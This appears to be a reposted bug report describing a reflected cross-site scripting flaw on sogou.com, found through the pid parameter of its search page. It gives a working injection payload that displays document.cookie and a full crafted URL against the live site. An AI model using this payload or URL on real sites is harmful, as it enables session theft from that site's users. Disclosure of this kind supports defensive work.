There is a XSS found on Sogou.com Severity: XSS Confidence: Confident Host: http://sogou.com Path: / Issue detail: If you enter the following XSS vector for the search field: "><video><source onerror=alert(document.cookie)> I will get back the following page: http://www.sogou.com/sogou?pid=AQxRG&query="><video><source onerror=alert(document.cookie)> However, this particular results page will not cause any XSS. However, after looking at the page for several minutes, the actual parameter that will cause XSS is actually pid http://www.sogou.com/sogou?pid=AQxRG"><video><source onerror=alert(document.cookie)>&query="><video><source onerror=alert(document.cookie)> Using the above link, you will see a XSS like the image below.
查看更多关于XSS found on Sogou.com - 网站安全 - 自学php的详细内容...